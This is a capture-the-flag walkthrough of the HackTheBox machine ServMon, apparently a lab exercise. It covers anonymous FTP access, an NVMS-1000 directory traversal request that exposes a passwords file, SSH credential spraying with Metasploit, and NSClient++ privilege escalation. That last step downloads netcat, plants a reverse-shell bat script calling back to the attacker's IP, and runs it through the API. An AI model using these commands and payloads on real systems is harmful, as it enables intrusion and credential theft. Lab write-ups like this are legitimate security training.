HackTheBox - ServMon | Walkthrough
As always, let's start with an nmap scan:
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.184 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); nmap -A -p$ports 10.10.10.184 -o nmap
We see quite a few ports open.
Let's check with the ftp first, as anonymous login is enabled.
ftp 10.10.10.184 #login as anonymous ftp> ls 01-18-20 12:05PM <DIR> Users ftp> ls Users 01-18-20 12:06PM <DIR> Nadine 01-18-20 12:08PM <DIR> Nathan ftp> ls Users/Nadine 01-18-20 12:08PM 174 Confidential.txt ftp> ls Users/Nathan 01-18-20 12:10PM 186 Notes to do.txt ftp>
So, we have a few very interesting files here. Let's get them.
ftp> cd Users/Nadine/ ftp> get Confidential.txt ftp> cd ../Nathan/ ftp> get Notes\ to\ do.txt
Now, let's check if we have write permissions here.
ftp> mkdir test 550 Access is denied. ftp>
So, it seems like we don't have write permission here. Let's check the files that we downloaded.
root@kali:~/hackthebox/servmon# cat Confidential.txt Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
So, there is a Passwords.txt file in Nathan's Desktop.
Now, let's check the other file:
root@kali:~/hackthebox/servmon# cat Notes\ to\ do.txt 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
Okay, let's check what else do we have here.
Let's try to curl the website.
It seeems pretty simple, its using JS to redirect us, let's use Firefox to check it out.
Opening the website with Firefox, we see that we are taken to a login page, and the title of the page is, "NVMS-1000".
Let's look if we have a publicly available exploit for it!
So, we have one, Directory Traversal.
cp /usr/share/exploitdb/exploits/hardware/webapps/47774.txt . root@kali:~/hackthebox/servmon# cat 47774.txt # Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 126.96.36.199 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
Let's fire up burp and try the directory traversal.
Catch a request being sent to the server, and send it to repeater.
Now, sending this request:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
We get the following response:
HTTP/1.1 200 OK Content-type: Content-Length: 92 Connection: close AuthInfo: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
Nice, now let's try the Passwords.txt file in Nathan's Desktop.
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Content-type: text/plain Content-Length: 156 Connection: close AuthInfo: 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
Now, let's save these passwords in a file.
And, then paste it in.
Now, let's make another file of the usernames that we know.
vi users.txt Nadine Nathan Administrator
Now, let's try spray these credentials on SSH.
msfconsole use auxiliary/scanner/ssh/ssh_login options set rhosts 10.10.10.184 set user_file users.txt set pass_file pass.txt run
Nice, we get a hit!
[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk'
Now, let's exit Metasploit and login with ssh.
ssh Nadine@10.10.10.184 #Now enter the password L1k3B1gBut7s@W0rk
Look! We get a shell! Beautiful!
Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>
Nice, now you can go get the user.txt file.
I'll load up powershell as I prefer working in it than in a normal shell.
nadine@SERVMON C:\Users\Nadine>powershell.exe -ExecutionPolicy bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\Users\Nadine> PS C:\Users\Nadine> whoami /all
Okay, now let's try getting some information about the system.
PS C:\Users\Nadine> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ERROR: Access denied PS C:\Users\Nadine>
Yikes, okay. That's disallowed, too.
Going back the notes of Nathan, we see that he talks about NSClient. Let's see what that is and if we have an exploit for it.
Nice, we do have an exploit! And guess what? It is for Privilege Escalation. Nice.
cp /usr/share/exploitdb/exploits/windows/local/46802.txt .
Now, in our victim machine:
cd "C:\Program Files\NSClient++" type .\nsclient.ini
Here you should see:
; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1
Nice, now we have the password.
Scheduler already seem to be enabled.
Now, let's download netcat.
cd C:\Temp\ powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/nc.exe','C:\Temp\nc.exe')"
Now, we need a bat file to use netcat to send us a reverse shell. For that, in your Kali machine make a new file:
vi evil.bat @echo off C:\Temp\nc.exe 10.10.14.78 4444 -e cmd.exe
Now, let's download this file.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.80:80/evil.bat','C:\Temp\abhizer.bat')"
Now, because only
127.0.0.1 is an allowed host, we can forward the port.
But, before that, le'ts try curling it.
We get an error, its because curl is set as some kind of an alias in PowerShell. I don't like that, so let's remove it.
Remove-Item alias:curl curl https://127.0.0.1:8443/
Now when we try to curl it, we get that the certificate is untrusted. Which is fine.
Let's forward that port. Quit the current ssh session and then:
ssh Nadine@10.10.10.184 -L 8443:127.0.0.1:8443
Now, from your local machine:
curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/abhizer.bat --data-binary @evil.bat Added abhizer as scripts\abhizer.bat
Now, let's set up a ssh listener first:
nc -nvlp 4444
And, now call the script:
curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:8443/api/v1/queries/abhizer/commands/execute?time=1s"
You should have a reverse shell as Administrator now!